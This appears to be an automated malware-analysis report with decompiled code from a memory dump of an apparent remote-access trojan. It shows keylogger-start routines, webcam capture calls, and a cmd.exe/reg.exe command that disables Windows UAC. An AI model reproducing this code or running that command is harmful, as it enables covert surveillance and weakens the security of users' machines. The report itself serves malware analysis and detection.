				_t97 = _t96 + 0xc;
				if(_t45 == 0) {
					L36:
					return 1;
				}
				_t48 = L00438E20(_t85, "DEFAULT", 7);
				_t98 = _t97 + 0xc;
				if(_t48 == 0) {
					goto L36;
				} else {
					goto L3;
				}
				do {
					L3:
					_t70 = _t85;
					_t86 = E004310F0(_t85, 0x4657e0);
					if(_t86 != 0) {
						_t76 = _t86 - _t70;
						L8:
						if(_t76 <= 0x31) {
							if(_t86 != 0) {
								_t89 = _t86 - _t70;
								L15:
								E0043A900( &_v80, _t70, _t89);
								_t98 = _t98 + 0xc;
								_t11 = _t89 - 1; // -1
								_t90 =  ==  ? _t11 : _t89;
								_t71 = 0;
								 *((char*)(_t95 + ( ==  ? _t11 : _t89) - 0x4c)) = 0;
								if(_v28 <= 0) {
									L20:
									_t72 = _v16;
									_t91 = _v12;
									goto L21;
								}
								_t93 = 0x4608fc;
								while(1) {
									_t15 = _t93 - 4; // 0x465d34
									_t59 = L00438E20( &_v80,  *_t15, 0x31);
									_t98 = _t98 + 0xc;
									if(_t59 == 0) {
										break;
									}
									_t67 = L00438E20( &_v80,  *_t93, 0x31);
									_t98 = _t98 + 0xc;
									if(_t67 == 0) {
										break;
									}
									_t71 = _t71 + 1;
									_t93 = _t93 + 0xc;
									if(_t71 < _v28) {
										continue;
									}
									goto L20;
								}
								_t82 = _v20;
								if(_t82 >= 0x12b) {
									goto L37;
								}
								_t76 = _t71 * 0xc;
								_t72 = _v16;
								 *((char*)(_t72 + _t82 + 4)) =  *((intOrPtr*)(_t76 + 0x460900));
								 *((char*)(_t72 + _t82 + 5)) =  *((intOrPtr*)(_t76 + 0x460901));
								_t62 =  *((intOrPtr*)(_t76 + 0x460900));
								_v20 = _t82 + 2;
								if(_t62 == 0x13) {
									L34:
									_v8 = 1;
									L35:
									_t91 = 1;
									_v12 = 1;
									goto L21;
								}
								if(_t62 != 0xc0) {
									L30:
									if(_v8 != 0) {
										L32:
										if(_v24 == 0) {
											_v24 = 1;
										}
										goto L35;
									}
									_t64 = E004310F0( &_v80, "ECDSA");
									_pop(_t76);
									if(_t64 != 0) {
										goto L34;
									}
									goto L32;
								}
								_t65 =  *((intOrPtr*)(_t76 + 0x460901));
								if(_t65 == 0xb4 || _t65 == 0xb5) {
									goto L34;
								} else {
									goto L30;
								}
							}
							_t92 = _t70;
							_t76 =  &(_t92[1]);
							do {
								_t68 =  *_t92;
								_t92 =  &(_t92[1]);
							} while (_t68 != 0);
							_t89 = _t92 - _t76;
							goto L15;
						}
						_t89 = 0x31;
						goto L15;
					}
					_t79 = _t70;
					_t81 =  &(_t79[1]);
					do {
						_t69 =  *_t79;
						_t79 =  &(_t79[1]);
					} while (_t69 != 0);
					_t76 = _t79 - _t81;
					goto L8;
					L21:
					_t85 = _t86 + 1;
				} while (_t86 != 0);
				if(_t91 != 0) {
					_push(_t76);
					 *_t72 = _v20;
					 *((char*)(_t72 + 0x154)) = 1;
					L00418C8B(_t72, _v8, _v24, _t76, 1);
				}
				return _t91;
			}




































                              0x0041b67a
                              0x0041b67d
                              0x0041b683
                              0x0041b687
                              0x0041b68a
                              0x0041b692
                              0x0041b695
                              0x0041b69c
                              0x0041b83c
                              0x00000000
                              0x0041b83c
                              0x0041b6aa
                              0x0041b6af
                              0x0041b6b4
                              0x0041b837
                              0x00000000
                              0x0041b839
                              0x0041b6c2
                              0x0041b6c7
                              0x0041b6cc
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041b6d2
                              0x0041b6d2
                              0x0041b6d8
                              0x0041b6df
                              0x0041b6e5
                              0x0041b6f9
                              0x0041b6fb
                              0x0041b6fe
                              0x0041b707
                              0x0041b71b
                              0x0041b71d
                              0x0041b723
                              0x0041b728
                              0x0041b72b
                              0x0041b731
                              0x0041b734
                              0x0041b736
                              0x0041b73e
                              0x0041b777
                              0x0041b777
                              0x0041b77a
                              0x00000000
                              0x0041b77a
                              0x0041b740
                              0x0041b745
                              0x0041b747
                              0x0041b74e
                              0x0041b753
                              0x0041b758
                              0x00000000
                              0x00000000
                              0x0041b762
                              0x0041b767
                              0x0041b76c
                              0x00000000
                              0x00000000
                              0x0041b76e
                              0x0041b76f
                              0x0041b775
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041b775
                              0x0041b7b5
                              0x0041b7be
                              0x00000000
                              0x00000000
                              0x0041b7c0
                              0x0041b7c3
                              0x0041b7cc
                              0x0041b7d6
                              0x0041b7dd
                              0x0041b7e3
                              0x0041b7e8
                              0x0041b825
                              0x0041b825
                              0x0041b82c
                              0x0041b82e
                              0x0041b82f
                              0x00000000
                              0x0041b82f
                              0x0041b7ec
                              0x0041b7fc
                              0x0041b800
                              0x0041b816
                              0x0041b81a
                              0x0041b81c
                              0x0041b81c
                              0x00000000
                              0x0041b81a
                              0x0041b80b
                              0x0041b811
                              0x0041b814
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041b814
                              0x0041b7ee
                              0x0041b7f6
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0041b7f6
                              0x0041b709
                              0x0041b70b
                              0x0041b70e
                              0x0041b70e
                              0x0041b710
                              0x0041b711
                              0x0041b715
                              0x00000000
                              0x0041b715
                              0x0041b702
                              0x00000000
                              0x0041b702
                              0x0041b6e7
                              0x0041b6e9
                              0x0041b6ec
                              0x0041b6ec
                              0x0041b6ee
                              0x0041b6ef
                              0x0041b6f3
                              0x00000000
                              0x0041b77d
                              0x0041b77f
                              0x0041b780
                              0x0041b78a
                              0x0041b792
                              0x0041b796
                              0x0041b79f
                              0x0041b7a6
                              0x0041b7ab
                              0x00000000

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _strncpy
                              • String ID: ALL$DEFAULT$ECDSA$TLS_AES_128_GCM_SHA256
                              • API String ID: 2961919466-1012175531
                              • Opcode ID: 78fa12b9f6d9d132d950df1abb8da17d93647f655761b6c6588f7c57589f5f63
                              • Instruction ID: 78e21791db2732ee694d72da95f641054b580d27861932b645a039a5d5b4fa6f
                              • Opcode Fuzzy Hash: 78fa12b9f6d9d132d950df1abb8da17d93647f655761b6c6588f7c57589f5f63
                              • Instruction Fuzzy Hash: 2E513735D043099BDF20AAA888857FFB7B9DB44304F14406FEC51A7382E7798986C7E9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00408744, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 70threadCOMMON
                              Download Yara Rule
                              C-Code - Quality: 84%
                              			E00408744(void* __ecx, char _a4) {
				char _v28;
				char _v32;
				void* _v56;
				void* __ebx;
				void* __edi;
				void* _t21;
				void* _t39;
				signed int _t41;
				void* _t43;

				_t43 = (_t41 & 0xfffffff8) - 0x1c;
				_push(_t21);
				_t39 = __ecx;
				_t2 = _t39 + 0x60; // 0x46c3b0
				 *((char*)(__ecx + 0x49)) = 1;
				L00409DD4(_t2,  &_a4);
				_t47 =  *0x46a9d4 - 0x32;
				_t35 = "Offline Keylogger Started";
				if( *0x46a9d4 != 0x32) {
					E00402064(_t21,  &_v28, "Offline Keylogger Started");
					_t43 = _t43 - 0x18;
					L00416C32(_t43,  &_v32);
					E00409636(_t21, _t39, _t47);
					L00401FA7();
				}
				_t44 = _t43 - 0x18;
				E00402064(_t21, _t43 - 0x18, _t35);
				E00402064(_t21, _t44 - 0x18, "[Info]");
				E004165D8(_t21, _t35);
				CreateThread(0, 0, 0x40884d, _t39, 0, 0);
				if( *_t39 == 0) {
					CreateThread(0, 0, E00408832, _t39, 0, 0);
				}
				CreateThread(0, 0, E0040885C, _t39, 0, 0);
				return L00401ED0();
			}












                              0x0040874a
                              0x00408750
                              0x00408752
                              0x00408756
                              0x00408759
                              0x0040875d
                              0x00408762
                              0x00408769
                              0x0040876e
                              0x00408775
                              0x0040877a
                              0x00408783
                              0x0040878a
                              0x00408793
                              0x00408793
                              0x00408798
                              0x0040879e
                              0x004087ad
                              0x004087b2
                              0x004087cc
                              0x004087d0
                              0x004087dc
                              0x004087dc
                              0x004087e8
                              0x004087f8

                              APIs
                              • CreateThread.KERNEL32(00000000,00000000,0040884D,0046C350,00000000,00000000), ref: 004087CC
                              • CreateThread.KERNEL32(00000000,00000000,00408832,0046C350,00000000,00000000), ref: 004087DC
                              • CreateThread.KERNEL32(00000000,00000000,0040885C,0046C350,00000000,00000000), ref: 004087E8
                                • Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
                                • Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
                                • Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CreateThread$EventLocalTimewsprintf
                              • String ID: Offline Keylogger Started$[Info]
                              • API String ID: 3534694722-3531117058
                              • Opcode ID: a0d024ad8c9949b0735535353f752cbf97b3fdb91e3ab862432188692a5b43dd
                              • Instruction ID: 917e057f81a48fe8b587d187e59d983f8dfdf23781fe50dc9a014371862e48e5
                              • Opcode Fuzzy Hash: a0d024ad8c9949b0735535353f752cbf97b3fdb91e3ab862432188692a5b43dd
                              • Instruction Fuzzy Hash: AB1198A25003083AD224B7369D86DBF3A5DDA81398F80453FF985221C3DE785E08C6FA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004093AF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65threadCOMMON
                              Download Yara Rule
                              C-Code - Quality: 89%
                              			E004093AF(void* __ecx) {
				char _v28;
				void* __ebx;
				void* __edi;
				void* _t7;
				void* _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t30 = __ecx;
				_t36 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					_t28 = "Online Keylogger Started";
					 *((char*)(__ecx + 0x4a)) = 1;
					E00402064(_t18,  &_v28, "Online Keylogger Started");
					_t32 = _t31 - 0x18;
					L00416C32(_t32,  &_v28);
					E00409636(_t18, _t30, _t36);
					L00401FA7();
					_t33 = _t32 - 0x18;
					E00402064(_t18, _t32 - 0x18, "Online Keylogger Started");
					E00402064(_t18, _t33 - 0x18, "[Info]");
					E004165D8(_t18, _t28);
					if( *((intOrPtr*)(_t30 + 0x49)) == 0) {
						if( *_t30 == 0) {
							CreateThread(0, 0, E00408832, _t30, 0, 0);
						}
						CreateThread(0, 0, E0040885C, _t30, 0, 0);
					}
					return CreateThread(0, 0, E0040886B, _t30, 0, 0);
				}
				return _t7;
			}











                              0x004093b7
                              0x004093ba
                              0x004093be
                              0x004093c4
                              0x004093c9
                              0x004093d1
                              0x004093d6
                              0x004093de
                              0x004093e5
                              0x004093ed
                              0x004093f2
                              0x004093f8
                              0x00409407
                              0x0040940c
                              0x0040941f
                              0x00409423
                              0x0040942f
                              0x0040942f
                              0x0040943b
                              0x0040943b
                              0x00000000
                              0x00409447
                              0x0040944f

                              APIs
                                • Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
                                • Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
                                • Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • CreateThread.KERNEL32(00000000,00000000,Function_00008832,?,00000000,00000000), ref: 0040942F
                              • CreateThread.KERNEL32(00000000,00000000,Function_0000885C,?,00000000,00000000), ref: 0040943B
                              • CreateThread.KERNEL32(00000000,00000000,Function_0000886B,?,00000000,00000000), ref: 00409447
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CreateThread$LocalTime$Eventwsprintf
                              • String ID: Online Keylogger Started$[Info]
                              • API String ID: 3546759147-3401407043
                              • Opcode ID: c33eb4240faf0f86eb9778156269051690524317534ddc2cfd41fbbcecfdff3d
                              • Instruction ID: 8fb703469506888dfee9d4bbb0c2098ebf9b351c4befbe7097037b3d6031c6da
                              • Opcode Fuzzy Hash: c33eb4240faf0f86eb9778156269051690524317534ddc2cfd41fbbcecfdff3d
                              • Instruction Fuzzy Hash: 0101A591A003183AD62076765D8BD7F7A5DCA82398F80447FFA81322C3D97D5D0982FA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00418732, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 70%
                              			E00418732() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				void* __edi;
				struct HWND__* _t20;
				void* _t23;

				E00431810(_t23,  &(_v68.style), 0, 0x2c);
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E004187B2;
				_v68.cbClsExtra = 0;
				asm("movsd");
				_v68.lpszClassName =  &_v20;
				_v68.cbWndExtra = 0;
				asm("movsd");
				_v68.lpszMenuName = 0;
				asm("movsd");
				asm("movsw");
				asm("movsb");
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t20 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t20 == 0) {
					GetLastError();
					goto L3;
				}
				return _t20;
			}








                              0x00418744
                              0x0041874e
                              0x00418758
                              0x0041875e
                              0x00418768
                              0x0041876b
                              0x0041876c
                              0x00418773
                              0x00418776
                              0x00418777
                              0x0041877a
                              0x0041877b
                              0x0041877d
                              0x00418787
                              0x004187a9
                              0x00000000
                              0x004187a9
                              0x00418799
                              0x004187a1
                              0x004187a3
                              0x00000000
                              0x004187a3
                              0x004187b1

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ClassCreateErrorLastRegisterWindow
                              • String ID: 0$MsgWindowClass
                              • API String ID: 2877667751-2410386613
                              • Opcode ID: aabe29d8945d597987256ed2f640e589badf12c9ea9fd14bed4f02890446ac43
                              • Instruction ID: 39839075c33bffd586aacb37a79c17ebe23a35f30f2176b7e199aa3a0e24e00b
                              • Opcode Fuzzy Hash: aabe29d8945d597987256ed2f640e589badf12c9ea9fd14bed4f02890446ac43
                              • Instruction Fuzzy Hash: 150125B5D0021CABDB00DFE5DC849EFBBBCFB04395F50493AF814A6240EB749A058AA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00432621, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                              Download Yara Rule
                              C-Code - Quality: 19%
                              			E00432621(void* __ebx, void* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				intOrPtr _t24;
				void* _t26;
				void* _t27;
				void* _t28;
				intOrPtr _t29;
				intOrPtr* _t31;
				void* _t33;

				_t28 = __edx;
				_t26 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_t5 =  &_a4; // 0x432a4d
					_push( *_t5);
					L00432C70(_t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_t7 =  &_a4; // 0x432a4d
				_push( *_t7);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				L00431BFB(_t27);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				L00432E72(_t26, _t27, _t28, _t29, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_t24 = _a24;
				_push( *((intOrPtr*)(_t24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				"j8h8~F"();
				if(_t24 != 0) {
					L00431BC9(_t24, _t29);
					return _t24;
				}
				return _t24;
			}












                              0x00432621
                              0x00432621
                              0x00432624
                              0x00432629
                              0x0043262c
                              0x0043262e
                              0x00432631
                              0x00432634
                              0x00432635
                              0x00432635
                              0x00432638
                              0x0043263d
                              0x0043263d
                              0x00432640
                              0x00432644
                              0x00432644
                              0x00432647
                              0x0043264c
                              0x00432649
                              0x00432649
                              0x00432649
                              0x0043264f
                              0x00432655
                              0x00432658
                              0x0043265a
                              0x0043265d
                              0x00432660
                              0x00432661
                              0x0043266a
                              0x0043266f
                              0x00432672
                              0x00432675
                              0x00432678
                              0x0043267b
                              0x0043267e
                              0x00432681
                              0x00432682
                              0x00432685
                              0x00432690
                              0x00432694
                              0x00000000
                              0x00432694
                              0x0043269b

                              APIs
                              • ___BuildCatchObject.LIBVCRUNTIME ref: 00432638
                                • Part of subcall function 00432C70: ___AdjustPointer.LIBCMT ref: 00432CBA
                              • _UnwindNestedFrames.LIBCMT ref: 0043264F
                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 00432661
                              • CallCatchBlock.LIBVCRUNTIME ref: 00432685
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                              • String ID: M*C
                              • API String ID: 2633735394-129833859
                              • Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                              • Instruction ID: 2b136e0aa6985e1208fe7cf03fe17269dead03c225157b686541d69b99605fa0
                              • Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                              • Instruction Fuzzy Hash: 5B016932000108BBCF126F56CD02EDA3BBAFF4D714F10501AF95861121C37AE861DBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040D797, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46processCOMMON
                              Download Yara Rule
                              C-Code - Quality: 50%
                              			E0040D797() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v92;
				void* __edi;
				void* _t17;
				long _t19;

				_t19 = 0x44;
				E00431810(_t17,  &_v92, 0, _t19);
				_v92.cb = _t19;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}








                              0x0040d7a2
                              0x0040d7ab
                              0x0040d7b2
                              0x0040d7bb
                              0x0040d7bc
                              0x0040d7bd
                              0x0040d7be
                              0x0040d7db
                              0x0040d7ea
                              0x0040d7f7

                              APIs
                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,0040C964,00000000,0046C578,00000001), ref: 0040D7DB
                              • CloseHandle.KERNEL32(0040C964), ref: 0040D7EA
                              • CloseHandle.KERNEL32(00000027), ref: 0040D7EF
                              Strings
                              • C:\Windows\System32\cmd.exe, xrefs: 0040D7D6
                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040D7D1
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseHandle$CreateProcess
                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                              • API String ID: 2922976086-4183131282
                              • Opcode ID: 97c280bce6da9a9ad1c74c6fab7c90947e3a5789ca2bb85f2e0812a43c64eebe
                              • Instruction ID: 787108f511e4318509bc76900ce72c09bd06e2e4a50587c84678304a4fe04e77
                              • Opcode Fuzzy Hash: 97c280bce6da9a9ad1c74c6fab7c90947e3a5789ca2bb85f2e0812a43c64eebe
                              • Instruction Fuzzy Hash: 3FF096B290022C7EEB009BE9DC85EEFBF7CEB44795F000436F604E6020D5705D148BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00405165, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44synchronizationCOMMON
                              Download Yara Rule
                              C-Code - Quality: 83%
                              			E00405165(void* __ecx, void* __edi) {
				void* __ebx;
				long _t19;
				intOrPtr _t28;
				void* _t29;
				void* _t30;
				void* _t31;
				intOrPtr _t38;

				_t29 = __edi;
				_t30 = __ecx;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				if( *((intOrPtr*)(__ecx + 0x5c)) <= 0) {
					L3:
					 *((char*)(_t30 + 0x50)) = 0;
					_t38 =  *0x46bb07; // 0x0
					if(_t38 != 0) {
						_t32 = _t31 - 0x18;
						E00402064(0, _t31 - 0x18, "Connection timeout");
						E00402064(0, _t32 - 0x18, "[WARNING]");
						E004165D8(0, _t29);
					}
					L00404DD5(_t30);
					return 1;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t19 = WaitForSingleObject( *(_t30 + 0x54), 0x3e8);
					 *((intOrPtr*)(_t30 + 0x60)) =  *((intOrPtr*)(_t30 + 0x60)) + 1;
					_t28 =  *((intOrPtr*)(_t30 + 0x60));
					if(_t19 == 0) {
						break;
					}
					if(_t28 <  *((intOrPtr*)(_t30 + 0x5c))) {
						continue;
					}
					goto L3;
				}
				CloseHandle( *(_t30 + 0x54));
				 *(_t30 + 0x54) = 0;
				 *((char*)(_t30 + 0x50)) = 0;
				SetEvent( *(_t30 + 0x58));
				return 0;
			}










                              0x00405165
                              0x00405167
                              0x0040516b
                              0x00405171
                              0x00405190
                              0x00405190
                              0x00405193
                              0x00405199
                              0x0040519b
                              0x004051a5
                              0x004051b4
                              0x004051b9
                              0x004051be
                              0x004051c3
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00405173
                              0x00405173
                              0x0040517b
                              0x00405181
                              0x00405184
                              0x00405189
                              0x00000000
                              0x00000000
                              0x0040518e
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040518e
                              0x004051d1
                              0x004051da
                              0x004051dd
                              0x004051e0
                              0x00000000

                              APIs
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,00405160), ref: 0040517B
                              • CloseHandle.KERNEL32(?), ref: 004051D1
                              • SetEvent.KERNEL32(?), ref: 004051E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandleObjectSingleWait
                              • String ID: Connection timeout$[WARNING]
                              • API String ID: 2055531096-1470507543
                              • Opcode ID: 878cdf7f212794c94f489166eab776e44960996326cc9d1c6d2bc6825e958f7a
                              • Instruction ID: ae60f77654cc690ea069452027dfbba6838492d045179776455cce24e18ac643
                              • Opcode Fuzzy Hash: 878cdf7f212794c94f489166eab776e44960996326cc9d1c6d2bc6825e958f7a
                              • Instruction Fuzzy Hash: C301D431A04F40AFC725BF35895651BBFA1EF0134A740083EE48396AA2CBB99408CB4A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00410420, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00410420(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, char _a20) {
				void* _v12;
				char _v1040;
				long _t17;

				if(RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12) != 0) {
					L3:
					return 0;
				}
				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
				RegCloseKey(_v12);
				if(_t17 != 0) {
					goto L3;
				}
				_t7 =  &_a20; // 0x40607d
				L00405A2F( &_v1040, _a16,  *_t7);
				L00405AB6( &_v1040, _a8, _a12);
				return 1;
			}






                              0x00410444
                              0x00410490
                              0x00000000
                              0x00410490
                              0x00410455
                              0x00410460
                              0x00410468
                              0x00000000
                              0x00000000
                              0x0041046a
                              0x00410476
                              0x00410487
                              0x00000000

                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 0041043C
                              • RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00410455
                              • RegCloseKey.ADVAPI32(00000000), ref: 00410460
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: origmsc$}`@
                              • API String ID: 3677997916-2850336352
                              • Opcode ID: 051950a050be9901e3d87e5ef00e9a8106184ddbf67cb3b65e55d040501c847b
                              • Instruction ID: ecacb93a6b8b5b9c49bbf3e02a5795d497c0a97730d5bb5037d868723a18005e
                              • Opcode Fuzzy Hash: 051950a050be9901e3d87e5ef00e9a8106184ddbf67cb3b65e55d040501c847b
                              • Instruction Fuzzy Hash: CF014B31900229BFCF219F91DC45EEB7F38EF05755F004165BE0862161E6358AA5DBA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00404466, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 201sleepCOMMON
                              Download Yara Rule
                              C-Code - Quality: 67%
                              			E00404466(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, char** _a8, signed int _a12) {
				char _v8;
				void* _v40;
				char _v44;
				char _v52;
				char _v60;
				char _v76;
				void* __esi;
				void* __ebp;
				void* _t25;
				char** _t27;
				intOrPtr* _t29;
				intOrPtr _t45;
				signed int _t54;
				signed int _t56;
				char* _t59;
				void* _t63;
				signed int _t64;
				void* _t66;
				signed int _t75;
				void* _t78;
				void* _t124;
				signed int _t126;
				signed int _t127;
				signed int _t128;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t135;
				void* _t138;
				void* _t139;
				intOrPtr* _t140;

				_push(__edi);
				_t120 = _a8;
				_t124 = __ecx;
				_t25 = E004027BA(__ecx, _a8);
				_t78 = _t124;
				_t146 = _t25;
				if(_t25 == 0) {
					_push(__ebx);
					E00402899(_t78, __edx, 0);
					_t27 = E0040221F();
					_t75 = _a12;
					_a8 = _t27;
					_t115 =  *_t27;
					__eflags =  !_t115 - _t75;
					if( !_t115 <= _t75) {
						E004028B8(_t124);
						asm("int3");
						_push(_t124);
						_t29 = L00401F75( &_v8);
						E00404286( &_v8,  &_v44, 4, 0xffffffff);
						_t138 = (_t135 & 0xfffffff8) - 0xc;
						E004020CC(_t75, _t138, _t115, __eflags, 0x46c238);
						_t139 = _t138 - 0x18;
						E004020CC(_t75, _t139, _t115, __eflags,  &_v60);
						L00416DD0( &_v76, _t115);
						_t140 = _t139 + 0x30;
						_t126 =  *_t29 - 0x3c;
						__eflags = _t126;
						if(__eflags == 0) {
							_t127 = E0040A15B(L00401F75(L00401E29( &_v52, _t115, __eflags, 0)));
							__eflags = _t127;
							if(_t127 != 0) {
								 *0x46bac4 = E0040A1B1(_t127, "OpenCamera");
								 *0x46bac0 = E0040A1B1(_t127, "CloseCamera");
								_t45 = E0040A1B1(_t127, "GetFrame");
								_t115 = "FreeFrame";
								 *0x46bac8 = _t45;
								 *0x46babc = E0040A1B1(_t127, "FreeFrame");
								 *0x46baaa = 1;
								E004020CC(_t75, _t140 - 0x18, "FreeFrame", __eflags, 0x46c1b8);
								_push(0x1b);
								goto L23;
							}
						} else {
							_t128 = _t126 - 1;
							__eflags = _t128;
							if(_t128 == 0) {
								__eflags =  *0x46ba77;
								if(__eflags != 0) {
									goto L20;
								}
							} else {
								_t129 = _t128 - 1;
								__eflags = _t129;
								if(_t129 == 0) {
									 *0x46bac0();
									 *0x46ba77 = 0;
								} else {
									_t130 = _t129 - 1;
									__eflags = _t130;
									if(_t130 == 0) {
										_t54 =  *0x46bac4();
										 *0x46ba77 = _t54;
										__eflags = _t54;
										if(__eflags == 0) {
											goto L15;
										} else {
											L20:
											_t115 = E00436079(_t49, L00401F75(L00401E29( &_v52, _t115, __eflags, 0)));
											E004046E8(_a4, _t51, __eflags);
										}
									} else {
										_t131 = _t130 - 1;
